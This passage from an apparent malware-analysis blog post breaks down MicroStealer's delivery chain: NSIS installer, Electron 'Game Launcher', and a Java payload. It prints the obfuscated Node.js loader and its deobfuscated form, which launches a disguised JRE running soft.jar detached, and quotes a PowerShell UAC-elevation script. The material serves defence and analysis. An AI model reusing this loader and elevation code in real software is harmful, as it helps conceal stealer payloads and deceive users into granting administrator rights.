class=\"wp-element-caption\"><em>Analysis&nbsp;of&nbsp;the&nbsp;ASAR&nbsp;archive contents&nbsp;<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>After unpacking app.asar using a standard ASAR unpacker, a small Node.js<strong> component <\/strong>becomes visible.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"614\" height=\"115\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6.jpg\" alt=\"Analysis\u00a0and\u00a0Unpacking\u00a0of\u00a0app.asar\u00a0\" class=\"wp-image-19089\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6.jpg 614w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-300x56.jpg 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-370x69.jpg 
370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-270x51.jpg 270w\" sizes=\"(max-width: 614px) 100vw, 614px\" \/><figcaption class=\"wp-element-caption\"><em>Analysis&nbsp;and&nbsp;unpacking&nbsp;of&nbsp;app.asar&nbsp;<\/em><\/figcaption><\/figure><\/div>\n\n\n<h2 class=\"wp-block-heading\">Static&nbsp;Analysis&nbsp;of&nbsp;the&nbsp;Node.js&nbsp;Component&nbsp;<\/h2>\n\n\n\n<p>At this stage, the focus shifts to the main script located in <strong>index.js<\/strong>. Opening it in a text editor immediately reveals multiple signs of obfuscation, including compressed strings, constants grouped into arrays, flattened control flow, and dead code.<\/p>\n\n\n\n<p>The next step is to analyze the string handling logic, since strings are used extensively throughout the program and can help reconstruct the malware\u2019s execution flow.<\/p>\n\n\n\n<p>To understand how the malware retrieves the strings it needs, let us examine the following code block:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: wrap\"><strong>var<\/strong>&nbsp;wa4Ibtk;&nbsp;\n(<strong>function<\/strong>&nbsp;() {&nbsp;\n<strong>function<\/strong>*&nbsp;mjAYxpv(mjAYxpv,&nbsp;JbBfOsP,&nbsp;PXuU6i,&nbsp;Tky9na&nbsp;=&nbsp;{&nbsp;\nrwLytg:&nbsp;{}&nbsp;\n}) {&nbsp;\n<strong>while<\/strong>&nbsp;(mjAYxpv&nbsp;+&nbsp;JbBfOsP&nbsp;+&nbsp;PXuU6i&nbsp;!==&nbsp;124)&nbsp;<strong>with<\/strong>(Tky9na.bWzSK3&nbsp;||&nbsp;Tky9na)&nbsp;<strong>switch<\/strong>&nbsp;(mjAYxpv&nbsp;+&nbsp;JbBfOsP&nbsp;+&nbsp;PXuU6i) 
{&nbsp;\n<strong>default<\/strong>:&nbsp;\n&#091;Tky9na.rwLytg.sZF0hF,&nbsp;Tky9na.rwLytg.MtsKAJ,&nbsp;Tky9na.rwLytg.AggjBE]&nbsp;=&nbsp;&#091;-57,&nbsp;-181,&nbsp;104];&nbsp;\nTky9na.bWzSK3&nbsp;=&nbsp;Tky9na.TDHlw5,&nbsp;mjAYxpv&nbsp;+=&nbsp;-134,&nbsp;JbBfOsP&nbsp;+=&nbsp;290,&nbsp;PXuU6i&nbsp;+=&nbsp;145;&nbsp;\n<strong>break<\/strong>;&nbsp;\n<strong>case<\/strong>&nbsp;162:&nbsp;\n<strong>case<\/strong>&nbsp;PXuU6i&nbsp;-&nbsp;-62:&nbsp;\nTky9na.bWzSK3&nbsp;=&nbsp;Tky9na.Q6N0rF,&nbsp;mjAYxpv&nbsp;+=&nbsp;-340,&nbsp;JbBfOsP&nbsp;+=&nbsp;290;&nbsp;\n<strong>break<\/strong>;&nbsp;\n<strong>case<\/strong>&nbsp;Tky9na.rwLytg.AggjBE&nbsp;+&nbsp;-186:&nbsp;\nTky9na.bWzSK3&nbsp;=&nbsp;Tky9na.IQz1SBX,&nbsp;mjAYxpv&nbsp;+=&nbsp;-211,&nbsp;JbBfOsP&nbsp;+=&nbsp;290;&nbsp;\n<strong>break<\/strong>;&nbsp;\n<strong>case<\/strong>&nbsp;-216:&nbsp;\n<strong>case<\/strong>&nbsp;9:&nbsp;\n<strong>case<\/strong>&nbsp;-78:&nbsp;\n<strong>case<\/strong>&nbsp;60:&nbsp;\n<strong>case<\/strong>&nbsp;PXuU6i&nbsp;-&nbsp;190:&nbsp;\n<strong>case<\/strong>&nbsp;-96:&nbsp;\n&#091;Tky9na.rwLytg.sZF0hF,&nbsp;Tky9na.rwLytg.MtsKAJ,&nbsp;Tky9na.rwLytg.AggjBE]&nbsp;=&nbsp;&#091;-62,&nbsp;172,&nbsp;231];&nbsp;\nrwLytg.DDXChP&nbsp;=&nbsp;\"\u0261\u2c43\u00bc\u01c0\u2f21\u782b\u206e\\\\\u01b0\u0de0\u7958\u0d00\u03a0\u4321\u6e21\u6d00\u0a82\u42a1\u4690\u0270\u0b0a\u2025&lt;\u4700\u0f80\u1569\u00f6&nbsp;(...truncated)\";&nbsp;\nrwLytg.tuWPH66&nbsp;=&nbsp;cIb9x8P.decompressFromUTF16(rwLytg.DDXChP);&nbsp;\nTky9na.bWzSK3&nbsp;=&nbsp;Tky9na.rwLytg,&nbsp;mjAYxpv&nbsp;+=&nbsp;-83,&nbsp;JbBfOsP&nbsp;+=&nbsp;227,&nbsp;PXuU6i&nbsp;+=&nbsp;-441;&nbsp;\n<strong>break<\/strong>;&nbsp;\n<strong>case<\/strong>&nbsp;40:&nbsp;\n<strong>case<\/strong>&nbsp;235:&nbsp;\n<strong>case<\/strong>&nbsp;mjAYxpv&nbsp;-&nbsp;-42:&nbsp;\nTky9na.rwLytg.zxxO0HE&nbsp;=&nbsp;tuWPH66.split(\"|\");&nbsp;\n<strong>return<\/strong>&nbsp;oh5cES&nbsp;=&nbsp;!0,&nbsp;wa4Ibtk&nbsp;=&nbsp;<strong>function<\/strong>&nbsp;(mjAYxpv) 
{&nbsp;\n<strong>return<\/strong>&nbsp;zxxO0HE&#091;mjAYxpv]&nbsp;\n}&nbsp;\n}&nbsp;\n}&nbsp;\n<strong>var<\/strong>&nbsp;oh5cES,&nbsp;JbBfOsP&nbsp;=&nbsp;mjAYxpv(-31,&nbsp;-159,&nbsp;415).next().value;&nbsp;\n<strong>if<\/strong>&nbsp;(oh5cES) {&nbsp;\n<strong>return<\/strong>&nbsp;JbBfOsP&nbsp;\n}&nbsp;\n})();&nbsp;<\/code><\/pre>\n\n\n\n<p>As the fragment shows, all strings are joined and compressed with the <strong>LZ-String<\/strong> library into a single Unicode string stored in the variable <strong>DDXChP<\/strong> (for example, \u201c\u0261\u2c43\u00bc\u01c0\u2f21\u782b\u206e\\\u01b0\u0de0\u7958\u0d00\u03a0\u4321\u6e21\u6d00\u2026\u201d).<\/p>\n\n\n\n<p>To restore them, the malware calls the <strong>decompressFromUTF16<\/strong> method: <code>rwLytg.tuWPH66 = cIb9x8P.decompressFromUTF16(rwLytg.DDXChP);<\/code><\/p>\n\n\n\n<p>This tells us that DDXChP was produced by LZ-String\u2019s <strong>compressToUTF16<\/strong>, which packs the compressed bit stream into valid UTF-16 code units (15 data bits per character) so that the blob survives being embedded in JavaScript source. The obfuscator references the library under a renamed identifier, here cIb9x8P, but the logic is unchanged: the original string data is reconstructed from the compressed sequence, and the same library copy can be reused by the analyst to do it offline.<\/p>\n\n\n\n<p>After decompression, the resulting string is split on the <strong>|<\/strong> delimiter: <code>Tky9na.rwLytg.zxxO0HE = tuWPH66.split(\"|\");<\/code><\/p>\n\n\n\n<p>A specific string is then retrieved by index through a <strong>getter function<\/strong>:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>wa4Ibtk =&nbsp;function&nbsp;(mjAYxpv) {&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;zxxO0HE&#091;mjAYxpv];&nbsp;\n};&nbsp;<\/code><\/pre>\n\n\n\n<p>Later, the malware references these strings through calls such as <strong>wa4Ibtk(3)<\/strong>, <strong>wa4Ibtk(7)<\/strong>, and <strong>wa4Ibtk(11)<\/strong>, where the argument is an index into the <strong>zxxO0HE<\/strong> 
array.<\/p>\n\n\n\n<p>After removing the unnecessary junk code, this logic can be represented in the following simplified form:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>var<\/strong>&nbsp;GetString;&nbsp;\n(<strong>function<\/strong>&nbsp;InitializeStringTable() {&nbsp;\n<strong>var<\/strong>&nbsp;compressed&nbsp;=&nbsp;\"\u0261\u2c43\u00bc\u01c0\u2f21\u782b\u206e\\\\\u01b0\u0de0\u7958\u0d00\u03a0\u4321\u6e21\u6d00&nbsp;(...truncated)\";&nbsp;\n<strong>var<\/strong>&nbsp;decompressed&nbsp;=&nbsp;lzObject.decompressFromUTF16(compressed);&nbsp;\n&nbsp;\nstringTable&nbsp;=&nbsp;decompressed.split(\"|\");&nbsp;\nGetString&nbsp;=&nbsp;<strong>function<\/strong>&nbsp;(index) {&nbsp;\n<strong>return<\/strong>&nbsp;stringTable&#091;index];&nbsp;\n};&nbsp;\n})();&nbsp;<\/code><\/pre>\n\n\n\n<p>Next, we copy the <strong>lzObject<\/strong> implementation from the target script and run the resulting function in a separate script. This makes it possible to extract all strings used by the program. Since the total number of recovered strings is quite large, only some of the most interesting examples are shown below, along with their indices.<\/p>\n\n\n\n<p>Note that many strings are truncated and concatenated directly in the code. 
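<\/p>\n\n\n\n<p>The step described above, rewriting each <code>wa4Ibtk(N)<\/code> call into its literal and folding the concatenated fragments, is mechanical and worth scripting. The block below is an added example written for this post, not code from the sample or from any deobfuscation tool: it runs the same passes over a constructed snippet modelled on the launch fragment quoted later, using a short stand-in string table and constant array whose contents and indices are assumptions (the recovered table is far larger and its indices differ). It is a textual pass, good enough for one script; for a large bundle an AST-based rewrite is the robust route.<\/p>

```javascript
'use strict';
// Added example (not from the MicroStealer sample): resolve the string-getter
// indirection of the obfuscated index.js in a few textual passes.
// ASSUMPTIONS: the getter is named wa4Ibtk and the constant array mjAYxpv, as
// in the fragments quoted on the page; STRING_TABLE and CONST_ARRAY are short
// constructed stand-ins (the recovered table is much larger and its indices
// differ), and SAMPLE is a constructed snippet modelled on the launch code.

const STRING_TABLE = ['', '', 'spawn', 'exec', 'env', 'soft.j', 'model', 'jre',
  'bin', 'miicro', 'soft.e', 'detach', 'stdio', 'ignore', 'unref', '-jar'];

const CONST_ARRAY = [0, null, 32, 2, 1, 256, 6, 3, 8, 16, 4, 'undefined',
  'LZString', '=', ' ', ';', '\\\\', 15, 30, '"', false, true];

const SAMPLE = `const { [wa4Ibtk(mjAYxpv[3])]: E5NpXn } = require("child_process");
const peB9yJ = _LLSkL.join(JbBfOsP, wa4Ibtk(6), wa4Ibtk(7), wa4Ibtk(8), wa4Ibtk(9) + wa4Ibtk(10) + "xe");
const vWOBncd = E5NpXn(peB9yJ, [wa4Ibtk(15), TD4p2BE], { [wa4Ibtk(11) + "ed"]: mjAYxpv[21], [wa4Ibtk(12)]: wa4Ibtk(13) });
vWOBncd[wa4Ibtk(14)]();`;

// Pass 1: mjAYxpv[i] -> literal constant (numbers, booleans, null, strings).
function inlineConstants(src, constArray, constName = 'mjAYxpv') {
  const re = new RegExp(`\\b${constName}\\[(\\d+)\\]`, 'g');
  return src.replace(re, (_, i) => JSON.stringify(constArray[Number(i)]));
}

// Pass 2: wa4Ibtk(i) -> the string literal at that index of the table.
function inlineGetter(src, table, getterName = 'wa4Ibtk') {
  const re = new RegExp(`\\b${getterName}\\((\\d+)\\)`, 'g');
  return src.replace(re, (_, i) => JSON.stringify(table[Number(i)]));
}

// Pass 3: "ab" + "cd" -> "abcd", repeated until nothing changes, so that
// chains such as "miicro" + "soft.e" + "xe" fold completely.
function foldConcats(src) {
  const re = /"((?:[^"\\]|\\.)*)"\s*\+\s*"((?:[^"\\]|\\.)*)"/g;
  let prev;
  do {
    prev = src;
    src = src.replace(re, (_, a, b) => `"${a}${b}"`);
  } while (src !== prev);
  return src;
}

// Cosmetic pass: { ["key"]: v } -> { key: v } and obj["name"] -> obj.name
// whenever the literal is a valid identifier.
function simplifyMembers(src) {
  return src
    .replace(/\["([A-Za-z_$][\w$]*)"\](?=\s*:)/g, '$1')
    .replace(/(?<=[\w$)\]])\["([A-Za-z_$][\w$]*)"\]/g, '.$1');
}

function deobfuscate(src, table = STRING_TABLE, constArray = CONST_ARRAY) {
  return simplifyMembers(foldConcats(inlineGetter(inlineConstants(src, constArray), table)));
}

console.log(deobfuscate(SAMPLE));
```

<p>Run with Node, the snippet collapses to the readable form shown later in this post: getter calls become literals, split fragments are joined, and bracket accesses are restored to dot syntax.<\/p>\n\n\n\n<p>Back to the recovered table: many of its entries are split across two or three getter calls. 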
Their full values are provided in parentheses:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: wrap\">&#091;2]  spawn \n&#091;3]  exec \n&#091;59] env \n \n&#091;11-25] \n    try { \n        Start-Process -FilePath \" -ArgumentList '--install' -Verb RunAs \n        Stop-Process -Id \n        exit 0 \n    } catch { \n        exit 1 \n    } \n \n&#091;35-41] powershell -ExecutionPolicy Bypass -NoProfile -NonInteractive -File \" \n \n&#091;27]    tmpdir \n&#091;32-34] writeF + ileSyn (writeFileSync) \n&#091;54-55] unlink + Sync (unlinkSync) \n&#091;79]    exists \n&#091;107-108] readFi + leSync (readFileSync) \n \n&#091;60-65] LOCALA + PPDATA \u2192 USERPR + OFILE \u2192 AppDat + a + Local (LOCALAPPDATA \/ USERPROFILE \/ AppData\\Local) \n&#091;66]    soft.j (soft.jar) \n&#091;67]    model \n&#091;68]    jre \n&#091;69]    bin \n&#091;70-71] miicro + soft.e (miicrosoft.exe) \n&#091;73-74] resour + cesPat (resourcesPath) \n&#091;76-78] app.as + ar.unp + acked (app.asar.unpacked) \n&#091;81-82] model. 
+ zip (model.zip) \n \n&#091;128]   -jar \n&#091;129-132] detach (detached), stdio, ignore, unref \n&#091;140-141] --inst + all (--install) <\/code><\/pre>\n\n\n\n<p>Let us now examine the obfuscated code fragments that implement the logic for launching the&nbsp;<strong>main payload<\/strong>, which is distributed in&nbsp;<strong>JAR format:<\/strong>&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: wrap\">&nbsp;&nbsp;&nbsp;&nbsp;<strong>const<\/strong>&nbsp;mjAYxpv&nbsp;=&nbsp;&#091;0,&nbsp;<strong>null<\/strong>,&nbsp;32,&nbsp;2,&nbsp;1,&nbsp;256,&nbsp;6,&nbsp;3,&nbsp;8,&nbsp;16,&nbsp;4,&nbsp;\"undefined\",&nbsp;\"LZString\",&nbsp;\"=\",&nbsp;\" \",&nbsp;\";\",&nbsp;\"\\\\\\\\\",&nbsp;15,&nbsp;30,&nbsp;\"\\\"\",&nbsp;!1,&nbsp;!0,&nbsp;<strong>void<\/strong>&nbsp;0,&nbsp;26,&nbsp;59,&nbsp;10,&nbsp;73,&nbsp;74,&nbsp;\"h\",&nbsp;55,&nbsp;66,\"ar\",&nbsp;79,&nbsp;1023,&nbsp;65536,&nbsp;55296,&nbsp;56320,&nbsp;63,&nbsp;31,&nbsp;12,&nbsp;18,&nbsp;7,&nbsp;128,&nbsp;192,&nbsp;\"e\",&nbsp;91,&nbsp;92,&nbsp;93,&nbsp;255,&nbsp;224,&nbsp;240,&nbsp;97,&nbsp;98,&nbsp;99,&nbsp;100,&nbsp;\"d\",&nbsp;33,&nbsp;\"c\",&nbsp;\")\",&nbsp;106,&nbsp;107,&nbsp;108,&nbsp;\"g\",&nbsp;24,&nbsp;60,&nbsp;1000];&nbsp;\n&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;<em>\/\/ ...<\/em>&nbsp;\n&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;<strong>const<\/strong>&nbsp;Tky9na&nbsp;=&nbsp;require(\"fs\"),&nbsp;\n&nbsp;&nbsp;&nbsp; _LLSkL&nbsp;=&nbsp;require(\"path\"),&nbsp;\n&nbsp;&nbsp;&nbsp; {&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &#091;wa4Ibtk(mjAYxpv&#091;3])]:&nbsp;E5NpXn,&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &#091;wa4Ibtk(mjAYxpv&#091;7])]:&nbsp;TD4p2BE&nbsp;\n&nbsp;&nbsp;&nbsp; }&nbsp;=&nbsp;require(\"child_process\"),&nbsp;\n&nbsp;&nbsp;&nbsp; peB9yJ&nbsp;=&nbsp;require(\"os\"),&nbsp;\n&nbsp;&nbsp;&nbsp; OnZdH7B&nbsp;=&nbsp;require(\"adm-zip\");&nbsp;\n&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;<em>\/\/ 
...<\/em>&nbsp;\n&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;<strong>const<\/strong>&nbsp;JbBfOsP&nbsp;=&nbsp;process&#091;wa4Ibtk(mjAYxpv&#091;24])]&#091;wa4Ibtk(mjAYxpv&#091;64])&nbsp;+&nbsp;wa4Ib(61)]&nbsp;||&nbsp;_LLSkL&#091;wa4Ibtk(mjAYxpv&#091;23])](process&#091;wa4Ibtk(mjAYxpv&#091;24])]&#091;wa4Ibtk(62)&nbsp;+wa4Ibtk(mjAYxpv&#091;37])],&nbsp;wa4Ibtk(64)&nbsp;+&nbsp;\"a\",&nbsp;wa4Ibtk(65)),&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; TD4p2BE&nbsp;=&nbsp;_LLSkL&#091;wa4Ibtk(mjAYxpv&#091;23])](JbBfOsP,&nbsp;wa4Ibtk(mjAYxpv&#091;30])&nbsp;+&nbsp;mjAYxpv&#091;31]),&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; peB9yJ&nbsp;=&nbsp;_LLSkL&#091;wa4Ibtk(mjAYxpv&#091;23])](JbBfOsP,&nbsp;wa4Ibtk(67),&nbsp;wa4Ibtk(68),&nbsp;wa4Ibtk(69),&nbsp;wa4Ibtk(70)&nbsp;+&nbsp;wa4Ibtk(71)&nbsp;+&nbsp;\"xe\");&nbsp;\n&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;<em>\/\/ ...<\/em>&nbsp;\n&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;<strong>const<\/strong>&nbsp;vWOBncd&nbsp;=&nbsp;E5NpXn(peB9yJ,&nbsp;&#091;wa4Ibtk(mjAYxpv&#091;42]),&nbsp;TD4p2BE],&nbsp;{&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &#091;wa4Ibtk(129)&nbsp;+&nbsp;\"ed\"]:&nbsp;mjAYxpv&#091;21],&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &#091;wa4Ibtk(130)]:&nbsp;wa4Ibtk(131),&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &#091;wa4Ibtk(mjAYxpv&#091;24])]:&nbsp;process&#091;wa4Ibtk(mjAYxpv&#091;24])]&nbsp;\n&nbsp;&nbsp;&nbsp; });&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;vWOBncd&#091;wa4Ibtk(132)]();&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;process&#091;wa4Ibtk(mjAYxpv&#091;59])](mjAYxpv&#091;0])&nbsp;<\/code><\/pre>\n\n\n\n<p>After&nbsp;removing the junk code and substituting&nbsp;the&nbsp;resolved&nbsp;strings, this logic&nbsp;can&nbsp;be&nbsp;represented&nbsp;in&nbsp;the&nbsp;following&nbsp;much&nbsp;more&nbsp;readable&nbsp;form:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: wrap\">const fs = require(\"fs\"); \nconst path = require(\"path\"); \nconst { spawn, exec } = require(\"child_process\"); \nconst os = 
require(\"os\"); \nconst AdmZip = require(\"adm-zip\"); \n \nconst baseDir = \n    process.env.LOCALAPPDATA || \n    path.join(process.env.USERPROFILE, \"AppData\", \"Local\"); \n \nconst jarPath = path.join(baseDir, \"soft.jar\"); \n \nconst javaExePath = path.join( \n    baseDir, \n    \"model\", \n    \"jre\", \n    \"bin\", \n    \"miicrosoft.exe\" \n); \n \nconst child = spawn( \n    javaExePath, \n    &#091;\"-jar\", jarPath], \n    { \n        detached: true, \n        stdio: \"ignore\", \n        env: process.env \n    } \n); \n \nchild.unref(); \n \nprocess.exit(0); <\/code><\/pre>\n\n\n\n<p>The malware then extracts an embedded JRE, disguises the executable as miicrosoft.exe, launches the JAR file in the background, and immediately terminates the main Node.js process, allowing the payload to continue running independently.<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\nConfirm\u00a0real attacker activity faster\n<br>Prevent suspicious files from <span class=\"highlight\">turning into enterprise incidents\u00a0<\/span>   \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=microstealer-technical-analysis&#038;utm_term=120326&#038;utm_content=linktoenterprise#contact-sales\" rel=\"noopener\" target=\"_blank\">\nContact us \n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: 
#ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<h2 class=\"wp-block-heading\">Breaking Down the Execution Chain&nbsp;<\/h2>\n\n\n\n<p>As part of its execution chain, the malware&nbsp;also attempts to obtain elevated privileges. This stage is not analyzed in detail here, as it&nbsp;relies primarily on social engineering: the victim is simply presented with a UAC prompt that is likely to be perceived as a normal part of the installation process.&nbsp;<\/p>\n\n\n\n<p>The PowerShell script used for this step is shown below:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: wrap\">try { \n    Start-Process -FilePath \"Game Launcher.exe\" -ArgumentList '--install' -Verb RunAs \n    Stop-Process -Id (pid) \n    exit 0 \n} catch { \n    exit 1 \n} <\/code><\/pre>\n\n\n\n<p>At this stage, the role of <strong>Game Launcher.exe<\/strong> becomes clear. The presence of the <strong>resources<\/strong> directory containing an <strong>ASAR archive<\/strong> and a <strong>Node.js project<\/strong> indicates the use of <strong>Electron<\/strong>. 
Analysis in <a href=\"https:\/\/github.com\/NationalSecurityAgency\/ghidra\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Ghidra<\/strong><\/a> confirms this: a modal window prompts to load <strong>electron.pdb<\/strong>, and both the strings and the entry point contain characteristic <strong>Electron artifacts<\/strong>.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1002\" height=\"400\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7.jpg\" alt=\"Strings from the Electron framework\" class=\"wp-image-19098\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7.jpg 1002w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-300x120.jpg 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-768x307.jpg 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-370x148.jpg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-270x108.jpg 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-740x295.jpg 740w\" sizes=\"(max-width: 1002px) 100vw, 1002px\" \/><figcaption class=\"wp-element-caption\"><em>Strings from the Electron framework in the disassembler confirm that Electron is used in the binary.<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Ultimately,&nbsp;<strong>Game Launcher.exe<\/strong>&nbsp;is an&nbsp;<strong>Electron application<\/strong>&nbsp;used as part of the malware&nbsp;delivery chain. 
The execution flow is as follows:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>NSIS (RocobeSetup.exe):<\/strong> an archive installer carrying the malicious payload<\/li>\n<li><strong>Electron (Game Launcher.exe):<\/strong> requests administrator privileges through UAC<\/li>\n<li><strong>Electron (Game Launcher.exe --install):<\/strong> extracts the bundled JRE and launches the JAR file<\/li>\n<li><strong>Java (miicrosoft.exe -jar soft.jar):<\/strong> executes the main malicious logic<\/li>\n<\/ul>\n\n\n\n<p>The combination of an NSIS installer and Electron complicates static analysis. Electron reads and executes JavaScript straight from the ASAR archive without extracting it to the file system, so the script never exists on disk as a standalone file for file-based scanners to examine; <strong>detection has to look inside the archive or at behavior<\/strong>, which is also why the unpacked app.asar is the right starting point for an analyst.<\/p>\n\n\n\n<p>At the same time, the NSIS installer keeps the payload packed inside its own executable, so the individual files are not present on disk, and not available for analysis or detection, until the installer itself runs.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Static Analysis of the Java Module<\/h2>\n\n\n\n<p>The next step is to analyze the main module by loading the <strong>JAR file<\/strong> into a <strong>Java decompiler<\/strong>. Once again, we encounter <strong>obfuscated code<\/strong>, this time on the <strong>Java<\/strong> side. As with the Node.js component, the strings are <strong>encrypted<\/strong> and recovered through <strong>helper functions<\/strong>. 
A representative fragment is shown below:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: wrap\">private static void lambda$checkEnvironment$1(String str) throws Exception { \n    int iD = a.d(); \n    String&#091;] strArr = new String&#091;a(0x5e23, 0x6709cb2b9951dedeL)]; \n    strArr&#091;0] = a((int) 0xfffff707, (int) 0xfffff6e2); \n    strArr&#091;1] = a((int) 0xfffff636, (int) 0xffff90f5); \n    strArr&#091;2] = a((int) 0xfffff6c2, (int) 0xfffff530); \n     \n    \/\/ ... \n \n    ?? AnyMatch = iD; \n    AnyMatch = Arrays.asList(strArr).stream().anyMatch((v1) -> { \n        return lambda$null$0(r1, v1); \n    }); \n} <\/code><\/pre>\n\n\n\n<p>After identifying this characteristic pattern, we examined the header of the .class file to look for traces of the obfuscator in use, and immediately found <strong>ZKM (Zelix KlassMaster) v21.0.0<\/strong>.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"165\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-1024x165.jpg\" alt=\"The presence of the ZKM (Zelix KlassMaster) v21.0.0\" class=\"wp-image-19099\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-1024x165.jpg 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-300x48.jpg 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-768x124.jpg 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-370x60.jpg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-270x44.jpg 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-740x119.jpg 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8.jpg 1121w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>The presence of the ZKM (Zelix 
KlassMaster) v21.0.0 obfuscator string in the Java class constant pool confirms its use&nbsp;<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>There are already several effective public deobfuscators available for this version of <strong>ZKM<\/strong>. In this case, <a href=\"https:\/\/github.com\/GraxCode\/threadtear\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Threadtear<\/strong><\/a> was used with a set of ZKM-focused modules, including <strong>string deobfuscation, access restoration, flow deobfuscation<\/strong>, and several additional modules for <strong>bytecode cleanup<\/strong>. After successful deobfuscation, the analysis proceeded to the malware\u2019s core functionality.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Overview of&nbsp;MicroStealer&nbsp;Capabilities&nbsp;<\/h2>\n\n\n\n<p>After deobfuscation, the code became significantly more readable, although not entirely; some parts of the logic still remain convoluted. Even so, the core functionality of MicroStealer is already open to analysis. 
